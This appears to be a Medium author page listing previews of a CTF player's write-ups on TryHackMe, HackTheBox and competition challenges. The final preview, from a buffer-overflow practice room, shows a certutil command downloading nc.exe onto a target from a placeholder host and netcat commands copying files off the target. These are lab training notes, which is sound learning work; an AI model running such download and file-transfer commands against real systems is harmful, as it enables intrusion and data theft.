H0j3n
CTF Player 🚩 || TRYHACKME || HACKTHEBOX || VULNHUB || STUDENT

Feb 9

This is my writing on joining GCC Online 2021

Image for post
Image for post

What is GCC?

GCC is an annual 1-week international cybersecurity training program.
Each participating country takes responsibility to host each annual edition. (Source: https://www.div0.sg/gcc)

Mission of GCC

Strengthen the security community across Asia and nurture future global leaders. Annually, the best 48 students (maximum) from member countries gather in one of the participating countries for a week to exchange experiences, forge a life-long friendship, and learn from the best cybersecurity professionals. Non-commercial education programs and communities organize the program supported by industry leaders who care about the safe digitalization of the world.

NanoSec Asia

Read more · 5 min read

Dec 7, 2020

Writeup by team H0j3n

Image for post
Image for post

Category: Web

DankDebrid

Read more · 16 min read

Nov 30, 2020

All my findings of Django will be updated here.

Setup

Python3

Make sure you have python3 install on your computer.

Image for post
Image for post
Python3 Page

Visual Studio Code (Code Editor)

Make sure you have a code editor and preferrable to have visual studio code.

Read more · 9 min read

Nov 14, 2020

Read more · 3 min read

Nov 13, 2020

Image for post
Image for post

Nmap

I found several ports open like 21, 22 & 1337.

Read more · 3 min read

Nov 8, 2020

This is a simple writeup by my team H0j3n.

Image for post
Image for post

Reverse Engineering

Coded_VI

I’m using radare2 to analyze the binary. By looking at the main I found a strings Tranqulat3d which could be the argument needed but its not the right one

pdf @main

Read more · 3 min read

Sep 27, 2020

Image for post
Image for post

Link to the machine:

My-Machine.ova

Edit description

t.co

Enumeration

By nmap I found 2 ports open

Read more · 3 min read

Aug 29, 2020

Image for post
Image for post

September sure will be busy so let’s pwn some boxes in HTB and training❤

Nmap Results

Read more · 5 min read

Aug 21, 2020

Step through the looking glass. A sequel to the Wonderland challenge room.

Image for post
Image for post

Enumeration

Let’s do nmap first and see what do we get.

There are thousands port are open within range of 9000 to 14000

Port 22

Since there are thousands of ports are open and all of these are ssh. Let's try manual first instead of doing the automation script. When we ssh to a port there is two outputs that we will get which Higher and Lower.

Read more · 5 min read

·Aug 14, 2020

Practice stack-based buffer overflows!

Image for post
Image for post

I did not use the RDP inside TryHackMe, instead, I download all the files needed on the machine and put in my own Windows.

How To Transfer The Files?

First, upload our nc.exe on that machine because I can't find nc on the machine,

certutil -urlcache -f http://<IP>/nc.exe c:\Users\admin\Desktop\nc.exe

Then I just use NC to transfer files. I don't know how to transfer all directory so instead, I just transfer each one inside the vulnerable-apps directory.

#On Our Machine
nc -l -p 1234 > oscp.exe#On Target Machine
nc.exe -w 3 <IP> 1234 < vulnerable-apps\oscp\oscp.exe

Keep doing that and let’s do…

Read more in The Startup · 14 min read

About

Help

Legal

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store